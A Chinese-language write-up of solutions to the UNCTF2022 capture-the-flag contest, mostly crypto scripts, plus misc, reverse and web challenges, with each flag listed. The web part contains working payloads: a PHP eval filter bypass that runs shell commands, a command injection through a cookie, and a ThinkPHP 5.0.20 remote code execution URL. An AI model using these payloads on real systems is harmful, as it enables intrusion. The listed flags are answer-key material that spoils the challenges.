为深入贯彻习近平总书记关于二十大提出的网络强国的重要思想,围绕建设网络强国的战略部署,建设网络强国的战略部署要与“两个一百年”奋斗目标同步推进,由御之安承办UNCTF2022网络安全大赛(以下简称“大赛”)将于今年11月份召开,以赛事为契机,提升网络安全保障能力,汇聚高端网络安全人才,共筑网络安全防线,为中国网络安全事业发展提供智力支撑和保障。
线上报名:2022年10月24日10:00-11月11日10:00,比赛时间:2022年11月12日12:00-11月18日12:00
Rank: 60Crypto
MD5-1
发现out.txt里面都是经过md5加密后的密文 本来想通过直接读取文件写的 但是报错 就通过把内容手写到一个列表里
然后通过脚本爆破得到
s = ['4c614360da93c0a041b22e537de151eb',
'8d9c307cb7f3c4a32822a51922d1ceaa',
'0d61f8370cad1d412f80b84d143e1257',
'b9ece18c950afbfa6b0fdbfa4ff731d3',
'800618943025315f869e4e1f09471012',
'f95b70fdc3088560732a5ac135644506',
'e1671797c52e15f763380b45e841ec32',
'c9f0f895fb98ab9159f51fd0297e236d',
'a87ff679a2f3e71d9181a67b7542122c',
'8fa14cdd754f91cc6554c9e71929cce7',
'e1671797c52e15f763380b45e841ec32',
'8277e0910d750195b448797616e091ad',
'cfcd208495d565ef66e7dff9f98764da',
'c81e728d9d4c2f636f067f89cc14862c',
'c9f0f895fb98ab9159f51fd0297e236d',
'92eb5ffee6ae2fec3ad71c777531578f',
'45c48cce2e2d7fbdea1afc51c7c6ad26',
'cfcd208495d565ef66e7dff9f98764da',
'a87ff679a2f3e71d9181a67b7542122c',
'1679091c5a880faf6fb5e6087eb1b2dc',
'8fa14cdd754f91cc6554c9e71929cce7',
'4a8a08f09d37b73795649038408b5f33',
'cfcd208495d565ef66e7dff9f98764da',
'e1671797c52e15f763380b45e841ec32',
'c9f0f895fb98ab9159f51fd0297e236d',
'8fa14cdd754f91cc6554c9e71929cce7',
'cfcd208495d565ef66e7dff9f98764da',
'c9f0f895fb98ab9159f51fd0297e236d',
'cfcd208495d565ef66e7dff9f98764da',
'e1671797c52e15f763380b45e841ec32',
'45c48cce2e2d7fbdea1afc51c7c6ad26',
'1679091c5a880faf6fb5e6087eb1b2dc',
'e1671797c52e15f763380b45e841ec32',
'8f14e45fceea167a5a36dedd4bea2543',
'c81e728d9d4c2f636f067f89cc14862c',
'c4ca4238a0b923820dcc509a6f75849b',
'c9f0f895fb98ab9159f51fd0297e236d',
'a87ff679a2f3e71d9181a67b7542122c',
'cbb184dd8e05c9709e5dcaedaa0495cf',
]
import hashlib
for i in s:
for w in '{}_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890':
md = hashlib.md5()
md.update(w.encode())
m=md.hexdigest()
if m == i:
print(w,end='')#UNCTF{e84fed028b9046fc0e8f080e96e72184}
MD5-2
import hashlib
m=[]
m.append(int('4c614360da93c0a041b22e537de151eb',16))
l = ['4c614360da93c0a041b22e537de151eb',
'c1fd731c6d60040369908b4a5f309f41',
'80fdc84bbb5ed9e207a21d5436efdcfd',
'b48d19bb99a7e6bb448f63b75bc92384',
'39eaf918a52fcaa5ed9195e546b021c1',
'795d6869f32db43ff5b414de3c235514',
'f59a054403f933c842e9c3235c136367',
'c80b37816048952a3c0fc9780602a2fa',
'810ecef68e945c3fe7d6accba8b329bd',
'cad06891e0c769c7b02c228c8c2c8865',
'470a96d253a639193530a15487fea36f',
'470a96d253a639193530a15487fea36f',
'4bdea6676e5335f857fa8e47249fa1d8',
'810ecef68e945c3fe7d6accba8b329bd',
'edbb7ab78cde98a07b9b5a2ab284bf0a',
'44b43e07e9af05e3b9b129a287e5a8df',
'a641c08ed66b55c9bd541fe1b22ce5c0',
'abed1f675819a2c0f65c9b7da8cab301',
'738c486923803a1b59ef17329d70bbbd',
'7e209780adf2cd1212e793ae8796ed7c',
'a641c08ed66b55c9bd541fe1b22ce5c0',
'a641c08ed66b55c9bd541fe1b22ce5c0',
'636a84a33e1373324d64463eeb8e7614',
'6ec65b4ab061843b066cc2a2f16820d5',
'a4a39b59eb036a4a8922f7142f874114',
'8c34745bd5b5d42cb3efe381eeb88e4b',
'5b1ba76b1d36847d632203a75c4f74e2',
'd861570e7b9998dbafb38c4f35ba08bc',
'464b7d495dc6019fa4a709da29fc7952',
'8eb69528cd84b73d858be0947f97b7cc',
'dd6ac4c783a9059d11cb0910fc95d4a',
'4b6b0ee5d5f6b24e6898997d765c487c',
'b0762bc356c466d6b2b8f6396f2e041',
'8547287408e2d2d8f3834fc1b90c3be9',
'82947a7d007b9854fa62efb18c9fd91f',
'8ddafe43b36150de851c83d80bd22b0a',
'c7b36c5f23587e285e528527d1263c8b',
'2a0816e8af86e68825c9df0d63a28381',
'63ce72a42cf62e6d0fdc6c96df4687e3'
]
for i in range(1,39):
a = hex(int(l[i], 16))[2:]
m.append(int(a,16)^int(m[i-1]))
# print(m)
for i in m:
a = hex(i)[2:]
if len(a)!=32:#发现有两个数据长度不正确 然后判断一下 在前面加上一个 0
a = '0'+a
for q in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_1234567890':
b = hashlib.md5(q.encode('utf-8')).hexdigest()
if b == a:
print(q,end='')
UNCTF{a197271943ceb3c3fe98bcadf10c29d4}
ezRSA
已知n,e,c然后求得d就可以求出m
把n放在在线网站上直接分解 或者利用gmpy2.iroot()开四次方
根据欧拉公式求得 phi然后既可以求出d
import gmpy2
import libnum
p=gmpy2.iroot(n)[0]
n = 62927872600012424750752897921698090776534304875632744929068546073325488283530025400224435562694273281157865037525456502678901681910303434689364320018805568710613581859910858077737519009451023667409223317546843268613019139524821964086036781112269486089069810631981766346242114671167202613483097500263981460561
e = 65537
c = 56959646997081238078544634686875547709710666590620774134883288258992627876759606112717080946141796037573409168410595417635905762691247827322319628226051756406843950023290877673732151483843276348210800329658896558968868729658727981445607937645264850938932045242425625625685274204668013600475330284378427177504
p=89065756791595323358603857939783936930073695697065732353414009005162022399741
#p=gmpy2.iroot(int(n),4)[0]
phi = p**4 - p**3
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))
#unctf{pneum0n0ultram01cr0sc0p01cs01l01c0v0lcan0c0n010s01s}crypto-Multi table
先根据给出的SDCGM 和 UNCTF 爆破出key= [9,15,23,16]
然后利用脚本爆破 然后在对应位置加上 { } 和 _
table={}
for i in range(26):
table[i]=ascii_uppercase[i:]+ascii_uppercase[:i]
print(table)
scii_uppercase = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
base_table=['J', 'X', 'I', 'S', 'E', 'C', 'R', 'Z', 'L', 'U', 'K', 'Q', 'Y', 'F', 'N', 'V', 'T', 'P', 'O', 'G', 'A', 'H', 'D', 'W', 'M', 'B']
# c = 'SDCGW'
c = 'SDCGWMPNVHGAXHUGERASMEZJNDBWNUZHETD'
# for i in range(0,25):
# s = table[i][base_table.index('T')]
# if s =='G':
# print(i)
key = [9,15,23,16]
x=0
for j in c:
for i in ascii_uppercase:
s = table[key[x % 4]][base_table.index(i)]
if s == j:
print(i,end='')
x += 1
break
UNCTF{WOW_YOU_KNOW_THIS_IS_VIGENERE_CIPHER}single_table
1 2 3 4 5
1 B C D E F
2 G H I K M
3 N O Q R S
4 T U V W X
5 Z P L A Y
OT UB M{B CQ_SP H_W OQ A_U AY FM KL WS}
3 2 4 2 U
4 1 3 1 N
4 2 1 2 C
1 1 4 1 T
2 5 1 5 F{
1 1 2 1 G
12 32 0
33 13 D_
35 55 Y
52 32 0
22 42 U_
44 24 K
32 32 0
33 33 Q
54 44 W_
42 52 P
54 54 A
55 55 Y
15 25 M
25 15 F
24 54 A
53 23 I
44 34 R
35 45 X得到UNCTF{GOD_YOU_KOQW_PAYMFAIRX}
然后因为这是playfair可以根据意思改一下flag
UNCTF{GOD_YOU_KNOW_PLAYFAIR}
caesar
根据提示他把ASCII码表换成了base64对照表 然后找出每个字母对应的表数 经过尝试 凯撒的偏移量是19 但是有的加上19之后超过了64 所以减上64
# c = 'B6vAy{dhd_AOiZ_KiMyLYLUa_JlL/HY}'
c = 'B6vAydhdAOiZKiMyLYLUaJlL/HY' #去掉大括号和_
base_table=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','`+','/']
list=[]
for i in c:
list.append(base_table.index(i))
print(list)
flag=''
for i in list:
if (i+19)>63:
flag+= base_table[i+19-64]
else:
flag+=base_table[i+19]
print(flag)UNCTF{w0w_Th1s_d1fFerent_c4eSar}ddddd
根据题目可得这应该是摩丝密码 替换得
..- -. -.-. - ..-. ----.-- -.-- ....- ... ..--.- - .... .---- ... ..--.- .--- ..- ... - ..--.- -- ----- .-. ... . -----.-
UNCTF{Y4S_TH1S_JUST_M0RSE}ez-RSA
该题位p的高位攻击 先还原出原来的p
先用sage求出p
然后利用脚本求出flag
#sage
# n = 102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
# p= (8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857) << 200
# e = 0x10001
#
# pbits = p.nbits()
# kbits = 200
# ph = p & (2 ^ pbits - 2 ^ kbits)
# PR.< x > = PolynomialRing(Zmod(n))
# f = x + ph
# xx = f.small_roots(X=2 ^ kbits, beta=0.4)[0]
# print(xx + ph)
import gmpy2
import libnum
e=0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p= 13150231070519276795503757637337326535824298772055543325920447062237907554543786311611680606624189166397403108357856813812282725390555389844248256805325917
q = n // p
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))UNCTF{It is a very_intersting_test!!!}
BABYRSA
该题是m高位攻击
先用sage脚本求出m然后直接转为flag
def phase2(high_m, n, c):
R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
m = high_m + x
M = m((m^6 - c).small_roots()[0])
print(libnum.n2s(int(M)))
n = 25300208242652033869357280793502260197802939233346996226883788604545558438230715925485481688339916461848731740856670110424196191302689278983802917678262166845981990182434653654812540700781253868833088711482330886156960638711299829638134615325986782943291329606045839979194068955235982564452293191151071585886524229637518411736363501546694935414687215258794960353854781449161486836502248831218800242916663993123670693362478526606712579426928338181399677807135748947635964798646637084128123883297026488246883131504115767135194084734055003319452874635426942328780711915045004051281014237034453559205703278666394594859431
c = 15389131311613415508844800295995106612022857692638905315980807050073537858857382728502142593301948048526944852089897832340601736781274204934578234672687680891154129252310634024554953799372265540740024915758647812906647109145094613323994058214703558717685930611371268247121960817195616837374076510986260112469914106674815925870074479182677673812235207989739299394932338770220225876070379594440075936962171457771508488819923640530653348409795232033076502186643651814610524674332768511598378284643889355772457510928898105838034556943949348749710675195450422905795881113409243269822988828033666560697512875266617885514107
high_m = 11941439146252171444944646015445273361862078914338385912062672317789429687879409370001983412365416202240
phase2(high_m, n, c)import libnum
print(libnum.n2s(int(11941439146252171444944646015445273361862078914338385912062672317789429687879409370002429378909002883709)))
#UNCTF{27a0aac7-76cb-427d-9129-1476360d5d1b}超级加倍
拿到一段数字刚开始没什么思路 然后就试了一下扔进分解网站上分解 得到一个数得四次方
然后尝试了直接利用在线网站转为文本但是出不来 就试着转为字节流试了一下
import libnum
print(libnum.n2s(int(777244835068351678348953354168377613564714552731792102125659619461244461053654492541)))UNCTF{it_is_much_bigger_than_before}
今晚吃什么
刚开始以为是摩丝 但是每个之间都有空格 然后又试了一下 二进制都不对
然后又看了下题目 今晚吃什么 可以想到培根密码
然后把1000换成A 00000换成B然后在在线网站解密
得到UNCTF{CRYPROISFUN}
Fermat
费马小定理
如果a,p两个数互为质数则 a**(p-1) = 1 mod p
g = x(p-1)
这里令a=2**x p=p
根据费马小定理得
2**x(p-1) mod p = 1
即为2**g mod p = 1
(2**g mod n) mod p = 1
所以 pow(2,g,n) - 1 =k*p
import gmpy2
import libnum
e = 0x10001
n = 19793392713544070457027688479915778034777978273001720422783377164900114996244094242708846944654400975309197274029725271852278868848866055341793968628630614866044892220651519906766987523723167772766264471738575578352385622923984300236873960423976260016266837752686791744352546924090533029391012155478169775768669029210298020072732213084681874537570149819864200486326715202569620771301183541168920293383480995205295027880564610382830236168192045808503329671954996275913950214212865497595508488636836591923116671959919150665452149128370999053882832187730559499602328396445739728918488554797208524455601679374538090229259
c = 388040015421654529602726530745444492795380886347450760542380535829893454552342509717706633524047462519852647123869277281803838546899812555054346458364202308821287717358321436303133564356740604738982100359999571338136343563820284214462840345638397346674622692956703291932399421179143390021606803873010804742453728454041597734468711112843307879361621434484986414368504648335684946420377995426633388307499467425060702337163601268480035415645840678848175121483351171989659915143104037610965403453400778398233728478485618134227607237718738847749796204570919757202087150892548180370435537346442018275672130416574430694059
g = 28493930909416220193248976348190268445371212704486248387964331415565449421099615661533797087163499951763570988748101165456730856835623237735728305577465527656655424601018192421625513978923509191087994899267887557104946667250073139087563975700714392158474439232535598303396614625803120915200062198119177012906806978497977522010955029535460948754300579519507100555238234886672451138350711195210839503633694262246536916073018376588368865238702811391960064511721322374269804663854748971378143510485102611920761475212154163275729116496865922237474172415758170527875090555223562882324599031402831107977696519982548567367160
p = gmpy2.gcd(pow(2,g,n)-1,n)
q = n // p
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))UNCTF{DO_y0u_Fermat_1ittle_theOrem}
MISC
magic_word
直接在网站上解码
unctf{We1come_new_ctfer}
找得到我吗
把docx文件改为zip文件 然后解压得
然后以记事本打开
直接搜索flag得
UNCTF{You_find_me!}
syslog
在syslog里面找到password cGFzc3dvcmQgaXMgVTZudTJfaTNfYjNTdA== 解码得 U6nu2_i3_b3St
然后输入压缩包密码 在flag.txt里面 找到flag
unctf{N1_sH3_D0n9_L0g_dE!}
pwn
welcomeUNCTF2022
经过分析得输入 UNCTF&2022
Re
whereisyourkey
a='vgpkcmhnci'
flag=''
for i in range(len(a)):
#print(a[i])
if a[i] <= 'o' and a[i]<='n':
flag+=chr(ord(a[i])-2)
else:
flag+=chr(ord(a[i])+3)
print(flag)UNCTF{yesiamflag}WEB
easy_upload
通过上传文件可以得出只有png文件可以上传成功
然后通过扫描网站目录得到一个www.rar压缩包下载得到index.php
<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
if (preg_match("/flag|\.\.|\/\//i", $file)) {
echo "no hack";
exit();
}
include $file;
}else{
include("upload.php");
}
?>发现如果通过GET方式传入一个文件 如果不出现被过滤得词就会include包含
然后就上传一个png文件 发现POST好像被过滤 那我们就用GET构造shell
然后在tmp下找到了flag.sh
然后cat查看内容
flag目录应该在/home/ctf/flag目录下
然后cat得到 UNCTF{165e39e0-cae3-4935-80cd-e7ef9242edee}
我太喜欢bilibili大学啦修复版
先是找到了hint_1 YWRtaW5fdW5jdGYucGhw
base64解码得 admin_unctf.php
然后得到一个登录页面查看源代码提醒我们抓包 在响应头里找到
dW5jdGYyMDIyL3VuY3RmMjAyMg==
解码得unctf2022/unctf2022
登陆得
<?php
putenv("FLAG=nonono");
if(!isset($_POST['username']) && !isset($_POST['password'])){
exit("username or password is empty");
}else{
if($_POST['username'] === "unctf2022" && $_POST['password'] === "unctf2022"){
show_source(__FILE__);
@system("ping ".$_COOKIE['cmd']);
}else{
exit("username or password error");
}
} 在cookie里加入cmd命令
base64解密到
https://space.bilibili.com/673907356
访问得到flag
UNCTF{this_is_so_easy}
签到
在源码里找到 20200101 20200101
然后后面是 20200102 20200102
一直到 20200131 20200131
得到flag flag{bfff6d206cbcd6ac0870a4f48
但是再往下flag就断了
最后发现2020132 一直到2020140
得到flag
UNCTF{bfff6d206cbcd6ac0870a4f48c7c313b}
babyphp
先扫描根目录发现了index.php文件 然后访问得到
<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_POST["a"])){
if($_POST["a"]==0&&$_POST["a"]!==0){
if(isset($_POST["key1"])&isset($_POST["key2"])){
$key1=$_POST["key1"];
$key2=$_POST["key2"];
if ($key1!==$key2&&sha1($key1)==sha1($key2)){
if (isset($_GET["code"])){
$code=$_GET["code"];
if(!preg_match("/flag|system|txt|cat|tac|sort|shell|\.| |\'/i", $code)){
eval($code);
}else{
echo "有手就行</br>";
}
}else{
echo "老套路了</br>";
}
}else{
echo "很简单的,很快就拿flag了~_~</br>";
}
}else{
echo "百度就能搜到的东西</br>";
}
}else{
echo "easy 不 easy ,baby 真 baby,都是玩烂的东西,快拿flag!!!</br>";
}
}
然后通过POST传入参数a利用科学计数法绕过第一层
然后是绕过sha1 利用数组绕过
POST绕过payload
a=s878926199a&key1[]=1&key2[]=2然后是GE传参
过滤了 flag|system|txt|cat|tac|sort|shell|.| |' 还过滤了空格 %20 %27
可以利用passthru绕过system 利用双引号绕过单引号 利用 %09绕过空格
利用 ?code=passthru(“ls%09/“);得到
可以发现有flag.txt 但是 cat flag txt . 都被过滤
利用more 绕过 cat 利用 * 绕过 flag txt .
payload
?code=passthru(“more%09/fl*”);
UNCTF{99hanDis_pHP_Ba_True_flag}
ezgame
通过查找页面源代码 发现main.js 然后打开js代码 搜索unctf得到
把它们连接经过尝试得到flag
UNCTF{c5f9a27d-6f88-49fb-a510-fe7b163f8dd3}
给你一刀
打开题目是这样一个页面 应该是thinphp漏洞 然后随便通过一个GET传参发现是thinkphp5.0.20漏洞
payload
http://d1021445-6982-4789-b0d2-b6ba3ffe304e.node.yuzhian.com.cn/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`%20and%20it%27ll%20execute%20the%20phpinfo%EF%BC%9A得到phpinfo页面 然后直接搜索 unctf
UNCTF{Y0u_A3r_so_G9eaD_hacker}
